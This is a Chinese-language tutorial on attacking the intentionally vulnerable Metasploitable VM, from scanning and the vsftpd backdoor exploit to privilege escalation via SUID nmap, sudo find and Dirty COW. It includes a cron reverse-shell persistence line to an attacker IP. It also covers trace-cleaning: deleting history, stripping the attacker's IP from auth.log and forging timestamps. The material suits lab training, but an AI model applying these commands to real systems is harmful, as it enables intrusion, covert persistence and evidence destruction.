Metasploitable靶机渗透与提权实战：从信息收集到权限提升的完整闭环

1. 项目概述：为什么我们需要一份“最终优化版”复习手册？

如果你在安全圈子里摸爬滚打了一段时间，尤其是从CTF或者渗透测试入门，那么“Metasploitable”这个名字你一定不陌生。它几乎是所有安全新手的“第一台靶机”，一个故意配置了无数漏洞的Linux系统，用来练习攻击技术。但不知道你有没有这种感觉：网上的教程千千万，跟着做一遍好像都会了，关上教程自己从头来，又总觉得少了点什么，步骤模糊，思路卡壳。或者，你成功拿到了一个初始shell，但面对提权环节，脑子里闪过好几种方法，却不知道哪种在当前环境下最有效、最直接。

这就是我整理这份《Metasploitable 靶机渗透 + 提权复习手册（最终优化版）》的初衷。它不是一个从零开始的新手教程，而是一份面向“已经学过但需要巩固、梳理和深化”的从业者的“作战地图”。这份手册的核心价值在于“优化”和“复习”——它摒弃了流水账式的步骤记录，转而聚焦于 渗透流程的标准化思维、关键决策点的逻辑分析，以及针对Metasploitable这类经典靶机的、高成功率的提权路径提炼 。我会把那些教程里一笔带过的“为什么这么做”讲清楚，把多个看似可行的方案进行对比，告诉你为什么在特定场景下A方法优于B方法，并分享那些只有踩过坑才知道的细节调整和应急备案。

简单来说，无论你是准备面试、复习基础知识，还是想建立一套属于自己的、可复用的内网渗透初步方法论，这份手册都能帮你把散落的知识点串联成线，形成肌肉记忆。我们不止于“getshell”，更要追求稳定、高效、深入地“get root”。

2. 渗透测试标准化流程再审视

很多人在练习时容易陷入“为了攻击而攻击”的陷阱，拿到IP就急着用msfconsole找exp。规范的流程是效率的保证，也能避免遗漏重要信息。对于Metasploitable这类已知存在大量漏洞的靶机，我们依然要严格执行流程，目的是训练一种条件反射般的专业习惯。

2.1 信息收集：超越简单的端口扫描

信息收集是渗透的基石，在这里，广度决定可能性，深度决定成功率。

2.1.1 主机发现与端口扫描

首先，确认靶机在线。在同一个网络环境下，使用 ping 命令是最快的。但要注意，现代靶机或真实环境中的服务器可能禁用了ICMP回应。所以，更稳妥的方式是使用ARP扫描或TCP SYN扫描。

# 使用nmap进行ARP扫描（同一局域网内速度极快）
sudo nmap -sn 192.168.1.0/24

# 找到靶机IP后，进行全端口扫描。不要只用默认的1000个端口。
sudo nmap -p- -T4 192.168.1.102

-p- 表示扫描所有65535个端口。 -T4 指定扫描速度，T4是一个平衡了速度和隐蔽性的选择。对于练习环境，我们可以用T4或T5；但在真实授权测试中，初期可能需要更慢的T2或T3。

扫描完成后，我们通常会看到Metasploitable开放了一大堆端口，比如21（FTP）、22（SSH）、23（Telnet）、80（HTTP）、443（HTTPS）、445（SMB）、3306（MySQL）、5432（PostgreSQL）等等。这时，下一步不是马上攻击，而是进行 服务版本探测和脚本扫描 。

# -sV: 探测服务/版本信息 -sC: 使用默认脚本进行扫描
sudo nmap -sV -sC -p 21,22,23,80,443,445,3306,5432,... 192.168.1.102

-sC 脚本扫描非常关键，它可能会直接暴露出一些漏洞信息，比如匿名FTP登录、HTTP的robots.txt、SMB共享枚举等。对于Metasploitable，运行此命令后，你可能会在输出中直接看到vsftpd 2.3.4的版本信息（关联著名的“笑脸漏洞”Backdoor Command Execution），或者Samba服务的信息。

2.1.2 Web应用信息深挖

如果开放了80/443端口，Web层面是重要的突破口。

1. 目录枚举 ：使用 gobuster 或 dirb 。不要只用默认字典，可以结合 /usr/share/wordlists/dirb/common.txt 和 big.txt 。

   gobuster dir -u http://192.168.1.102 -w /usr/share/wordlists/dirb/common.txt -x php,txt,html,bak
   

   在Metasploitable上，你可能会发现 /phpmyadmin/ ， /mutillidae/ ， /dvwa/ 等路径，这些都是内置的漏洞Web应用。
2. 技术栈识别 ：查看HTTP响应头（用浏览器开发者工具或 curl -I ），注意 Server 、 X-Powered-By 等字段。Metasploitable的Apache通常版本较低。
3. 手动浏览 ：访问每个发现的页面和功能点。Metasploitable的Web首页往往有一个包含所有Web应用链接的页面，这是你的“漏洞菜单”。

2.1.3 其他服务枚举

• SMB枚举 ：使用 enum4linux 或 smbclient 查看可用的共享和用户。

  enum4linux -a 192.168.1.102
  smbclient -L //192.168.1.102/
  

• SNMP枚举 ：如果开放了161端口，可以使用 snmpwalk 收集系统信息。

  snmpwalk -v2c -c public 192.168.1.102
  

注意 ：信息收集阶段要养成做笔记的习惯。推荐使用 Obsidian 、 Joplin 这类支持Markdown的笔记软件，或者 CherryTree 这样的结构化笔记工具。为每个IP建立一个页面，记录开放的端口、服务版本、发现的路径、可能的漏洞点、测试用的凭证等。清晰的笔记是复杂渗透测试中不乱套的关键。

2.2 漏洞扫描与利用：从自动化到精准化

在信息收集的基础上，我们可以进行更有针对性的漏洞探测。

2.2.1 自动化工具辅助

使用 Nessus 、 OpenVAS 或 Nexpose 等漏洞扫描器对靶机进行全面扫描。对于Metasploitable，这些扫描器几乎能报出它所有的已知漏洞。 但请注意 ：扫描报告是“地图”，不是“自动驾驶”。它告诉你这里可能有地雷（漏洞），但如何安全地趟过去（利用），并拿到战利品（权限），需要你自己判断和操作。自动化扫描器有时会产生误报，也可能遗漏一些需要特定交互或条件才能触发的漏洞。

2.2.2 手动验证与利用

这是核心环节。根据信息收集结果，列出最有可能的突破口，按优先级进行测试。对于Metasploitable，经典的突破口包括：

1. Vsftpd 2.3.4 后门 ：这是最直接的之一。在nmap的 -sC 扫描结果中如果确认了此版本，可以直接使用Metasploit。

   msfconsole
   use exploit/unix/ftp/vsftpd_234_backdoor
   set RHOSTS 192.168.1.102
   run
   

   成功后直接获得一个root shell。 为什么它是root？ 因为这个后门代码是在服务启动时以root权限监听了一个特定端口，连接并发送特定payload后，直接以服务进程的权限（root）执行了命令。
2. UnrealIRCD 3.2.8.1 后门 ：同样是一个经典后门，在6667端口。利用方式类似。
3. Samba username map script 漏洞 ：这是一个命令注入漏洞。利用它通常能获得一个以 root 或 daemon 权限运行的shell。
4. Distcc 后门 ：分布式编译服务中的漏洞。
5. Web应用漏洞 ：如DVWA（命令注入、文件包含、SQL注入）、phpMyAdmin（弱口令）、Mutillidae II（各种OWASP Top 10漏洞）。

选择利用路径的逻辑 ：优先选择 无需凭证 、 利用过程稳定 、 直接返回高权限shell 的漏洞。因此，像vsftpd后门、UnrealIRCD后门、Samba命令注入这类，应作为第一优先级。Web漏洞通常需要更多步骤，可能先获得Webshell，再尝试提权，路径更长。

3. 初始立足点获取与后渗透准备

成功利用漏洞后，我们获得的可能是一个 meterpreter 会话、一个普通的 /bin/bash 反向shell，或者是一个功能受限的shell（如 www-data 用户的shell）。这个阶段的目标是： 将不稳定的、功能受限的shell，升级为一个稳定的、功能完整的交互式shell，并做好内网探索的准备 。

3.1 Shell稳定性优化

反向Shell可能因为网络波动或会话超时而断开。我们需要将其“固化”。

1. 升级为交互式TTY Shell ：很多漏洞利用后得到的shell是非交互式的，无法使用 su 、 sudo 、 vi 等需要终端特性的命令。

   # 方法一：使用Python（最常见有效）
   python -c 'import pty; pty.spawn("/bin/bash")'
   
   # 方法二：如果Python不可用，尝试其他语言
   /bin/bash -i
   perl -e 'exec "/bin/sh";'
   # 或者使用script命令
   /usr/bin/script -qc /bin/bash /dev/null
   

   使用Python的 pty 模块是首选，它能模拟出一个完整的终端环境。

2. 后台与持久化（针对Meterpreter） ：如果你用的是Metasploit的 meterpreter ，务必在拿到会话后立即将其迁移到一个稳定的进程上，防止因为初始漏洞进程崩溃而导致会话结束。

   # 在meterpreter会话中
   run post/windows/manage/migrate  # 对于Windows，自动迁移
   # 或者手动查看进程并迁移
   ps
   migrate <PID> # 选择一个类似explorer.exe或svchost.exe的稳定进程PID
   

   对于Linux，也可以寻找像 sshd 、 apache2 等长期运行的进程进行迁移。

3. 生成持久化后门 ：为了在断开连接后还能回来，可以添加一个后门用户或安装一个反向shell连接。

   • 添加SSH密钥 ：如果靶机开放SSH且你有写 ~/.ssh/authorized_keys 的权限，这是最隐蔽的方式。
   • Metasploit持久化模块 ：使用 exploit/linux/local/sshkey_persistence 等模块。
   • Cron定时任务 ：添加一个cron job，定期向你的监听端发送反向shell。

     (crontab -l 2>/dev/null; echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/你的IP/你的端口 0>&1'") | crontab -
     

     注意 ：这种方法容易被发现，仅用于练习或特定场景。

3.2 初步信息收集（立足点内部）

拿到稳定Shell后，不要急着提权。先收集当前用户和环境的信息，这能为你选择提权方法提供关键依据。

# 1. 当前用户和权限
id
whoami
sudo -l  # 非常重要！查看当前用户可以以root身份运行哪些命令

# 2. 系统信息
uname -a  # 内核版本
cat /etc/issue 或 cat /etc/*release  # 发行版信息
lsb_release -a 2>/dev/null

# 3. 网络信息
ifconfig 或 ip a
netstat -antup 或 ss -tulnp
cat /etc/hosts
arp -a

# 4. 进程信息
ps aux | grep root  # 查看root运行的进程
ps auxf  # 查看进程树

# 5. 文件系统信息
find / -type f -perm -4000 -ls 2>/dev/null  # 查找SUID文件
find / -type f -perm -2000 -ls 2>/dev/null  # 查找SGID文件
find / -writable -type d 2>/dev/null  # 查找当前用户可写的目录
find / -type f -name "*.conf" -o -name "*config*" 2>/dev/null | head -20 # 查找配置文件

# 6. 计划任务
crontab -l
ls -la /etc/cron* /var/spool/cron/

# 7. 查看安装的软件包
dpkg -l  # Debian/Ubuntu
rpm -qa  # CentOS/RHEL

这些命令的输出是提权的“寻宝图”。特别是 sudo -l 和查找SUID文件，经常能直接找到提权的捷径。

4. Linux提权方法论与在Metasploitable上的实践

提权是渗透测试中最具技巧性的环节之一。下面我们系统化地梳理Linux提权路径，并结合Metasploitable的环境进行实战推演。

4.1 信息驱动的提权路径选择

根据上一步收集的信息，我们可以按如下优先级选择提权方法：

4.2 Metasploitable经典提权场景实战

假设我们通过Web漏洞（如DVWA的文件上传）获得了 www-data 用户的shell。现在开始提权。

场景一：利用SUID文件 - nmap （旧版本）

旧版 nmap （5.0以前）支持交互模式（ !sh ），如果它以SUID权限运行，就能直接获得root shell。

1. 检查是否存在SUID的 nmap ：

   find / -type f -perm -4000 -name \"nmap\" 2>/dev/null
   ls -la /usr/local/bin/nmap  # Metasploitable中nmap可能在这个路径
   

2. 如果找到，检查其版本：

   nmap --version
   

   如果版本号小于5.0（如Metasploitable中的4.53），则很可能可利用。
3. 利用交互模式提权：

   /usr/local/bin/nmap --interactive
   nmap> !sh
   whoami
   # 此时应该显示 root
   

   实操心得 ：并非所有旧版nmap都行，但Metasploitable里的这个是可以的。这是一种“合法功能滥用”，因为nmap的交互模式设计初衷是方便用户执行系统命令，当它以root的SUID运行时，自然就获得了root权限。

场景二：利用 sudo -l 发现的命令

运行 sudo -l ，输入当前用户密码（可能是空或弱口令，如 www-data 用户的密码有时就是 www-data ）。在Metasploitable中，你可能会发现类似这样的输出：

User www-data may run the following commands on metasploitable:
    (root) NOPASSWD: /usr/bin/find

这意味着 www-data 用户可以 无需密码 以root身份运行 find 命令。

1. 利用 find 命令提权：

   sudo find /etc/passwd -exec /bin/bash \\;
   # 或者
   sudo find . -exec /bin/sh \\; -quit
   

   执行后，你会获得一个root shell。原理是 -exec 参数允许执行任意命令，而 sudo 赋予了 find 命令root权限，因此执行的 /bin/bash 也以root身份运行。

场景三：内核漏洞提权 - Dirty Cow (CVE-2016-5195)

Metasploitable 2的内核版本是2.6.24，存在著名的Dirty Cow漏洞，该漏洞几乎100%可靠。

1. 在攻击机上下载Dirty Cow的EXP代码。可以从GitHub或Exploit-DB获取。
2. 在靶机上找一个可写目录（如 /tmp ），将EXP上传。可以通过简单的Python HTTP服务器和 wget 实现。
   • 攻击机（Kali）上：

     python3 -m http.server 8080
     

   • 靶机（Metasploitable）shell中：

     cd /tmp
     wget http://<你的Kali IP>:8080/dirty.c
     

3. 编译并运行EXP：

   gcc -pthread dirty.c -o dirty
   ./dirty
   

4. 运行成功后，它会提示你按回车键，然后会修改 /etc/passwd ，将root用户的密码清空（或替换为一个已知密码）。之后，你就可以用 su root 直接切换，无需密码。

   注意事项 ：Dirty Cow EXP运行有一定风险，可能导致系统不稳定甚至崩溃。在真实生产环境中绝对禁止使用！仅在授权的测试环境或像Metasploitable这样的专用靶机上练习。

场景四：弱口令与密码复用

在信息收集阶段，你可能已经通过枚举或漏洞获得了其他服务的密码。例如，通过phpMyAdmin的弱口令（root:root）进入了数据库。可以尝试在系统层面复用这些密码。

1. 尝试切换用户：

   su root
   # 输入你从其他地方获得的密码，如 `root`, `toor`, 空密码等。
   

2. 尝试SSH连接：

   ssh root@localhost
   # 输入猜测的密码
   

   Metasploitable中root的默认密码可能是 toor （metasploit的倒写）。

5. 后渗透清理、痕迹管理与报告思维

在练习中，我们往往拿到flag或root权限就结束了。但在真实的渗透测试或红队行动中，清理痕迹和形成报告是必不可少的环节。即使是在靶机练习，培养这种习惯也至关重要。

5.1 基本的痕迹清理

在Metasploitable上，我们可以练习清理以下常见痕迹：

1. Shell历史记录 ： bash 会记录命令历史到 ~/.bash_history 。

   # 清理当前用户的历史
   history -c  # 清除内存中的历史
   rm ~/.bash_history  # 删除历史文件
   # 或者更隐蔽地，只删除涉及敏感操作的行
   sed -i '/wget\|curl\|nc\|nmap\|msfconsole/d' ~/.bash_history
   

2. 日志文件 ：Linux日志主要存放在 /var/log/ 。需要关注的日志包括：
   • /var/log/auth.log 或 /var/log/secure ：认证日志，会记录SSH登录、su、sudo等。
   • /var/log/apache2/access.log , error.log ：Web访问日志。
   • /var/log/syslog ：系统综合日志。 注意 ：直接删除整个日志文件是异常行为。更隐蔽的做法是只删除与自己IP或用户名相关的条目。但在靶机练习中，为了简化，我们可以了解这个位置即可。在真实环境中，需要根据目标的安全防护水平谨慎操作。

   # 示例：从auth.log中删除包含自己IP的行（假设IP为192.168.1.100）
   sed -i '/192.168.1.100/d' /var/log/auth.log
   

3. 文件时间戳 ：使用 touch 命令修改你创建或修改过的文件的时间戳，使其与周围文件一致。

   touch -r /etc/passwd /tmp/my_backdoor.sh  # 将后门文件时间戳改为和passwd一样
   

5.2 建立报告思维

练习的终点不应是拿到root，而应该是“我如何向客户或团队清晰地复现和说明这一切”。在操作过程中，就要有意识地收集证据。

1. 截图/录屏 ：对关键步骤进行截图，如nmap扫描结果、漏洞利用成功的界面、 id 命令显示root权限、 /etc/shadow 内容等。
2. 命令输出保存 ：将重要的命令输出重定向到文件。

   ifconfig > /tmp/network_info.txt
   cat /etc/passwd > /tmp/passwd.txt
   # 然后从靶机下载这些文件到本地
   

3. 整理攻击链 ：在笔记中清晰地画出攻击路径：
   • 信息收集发现A漏洞。
   • 利用A漏洞获得B用户权限。
   • 在B用户环境下，通过C方法（SUID/sudo/内核漏洞）提权至root。
   • 发现了D敏感信息。
4. 风险评估与建议 ：针对发现的每个漏洞，思考在真实环境中它可能造成的实际影响（数据泄露、服务中断、权限失控等），并给出简单的修复建议（升级软件、修改配置、禁用服务等）。

例如，对于vsftpd后门，报告里可以写：“目标系统运行存在已知后门的Vsftpd 2.3.4版本，攻击者可无需认证直接获取root权限。 建议 ：立即升级Vsftpd至最新安全版本。”

这份《最终优化版》手册，其“优化”之处就在于将离散的攻击动作，整合为一条从信息收集到权限提升，再到痕迹管理的完整闭环思维。它不仅仅是Metasploitable的攻略，更是一套可以迁移到其他Linux靶机甚至真实环境（在合法授权前提下）的初级方法论。真正的熟练，不是记住所有命令，而是理解每个命令背后的意图，并在面对新环境时，能自己推导出该用什么命令。希望这份手册能成为你达到那种熟练度的垫脚石。